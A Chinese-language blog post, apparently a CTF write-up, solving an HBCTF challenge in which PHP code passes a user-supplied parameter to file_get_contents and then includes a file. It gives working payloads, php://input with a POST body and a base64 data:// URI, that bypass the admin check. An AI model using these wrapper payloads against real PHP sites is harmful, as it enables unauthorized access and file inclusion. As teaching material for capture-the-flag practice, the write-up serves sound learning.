[CTF]No.0002 莫桑比克-php是最好的语言(待完善)

最新推荐文章于 2024-04-24 19:26:01 发布

林毅洋

最新推荐文章于 2024-04-24 19:26:01 发布

阅读量1.4k

点赞数

分类专栏： CTF每日一题 CTF 文章标签： CTF PHP伪协议

CTF 同时被 2 个专栏收录

13 篇文章 1 订阅

订阅专栏

CTF每日一题

9 篇文章 1 订阅

订阅专栏

莫桑比克-php是最好的语言

来源：HBCTF第一场WP
类别：php伪协议、data协议
来源：http://www.moonsos.com/post/256.html
用到工具：HxD（16进制编辑器）或 winhex
　　　　　WINRAR 或好压（查看 CRC32）

题目地址：http://123.206.66.106（已失效）

右击查看源码

you are not admin ! 
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
 -->

方法一：

先要加入user参数，而且要满足最后得到的user参数结果为 “the user is admin”，可以利用php伪协议：

http://123.206.66.106/index.php?user=php://input

同时利用Hackbar(一个火狐插件)发送post数据为

the user is admin

方法二：

也可以利用data协议：

http://123.206.66.106/?user=data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4=
（dGhlIHVzZXIgaXMgYWRtaW4= base64解码后为the user is admin）

得到如图界面：

查看源码得到flag

参考

file_get_contents()
php://
data://

原文：米安网

林毅洋

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[CTF]No.0002 莫桑比克-php是最好的语言(待完善)

每日一题CTF 0002莫桑比克-php是最好的语言来源：HBCTF第一场WP 类别：php伪协议、data协议来源：http://www.moonsos.com/post/256.html 用到工具：HxD（16进制编辑器）或 winhex 　　　　　WINRAR 或好压（查看 CRC32）题目地址：http://123.206.66.106（已失效）右击查看源码you are
复制链接

扫一扫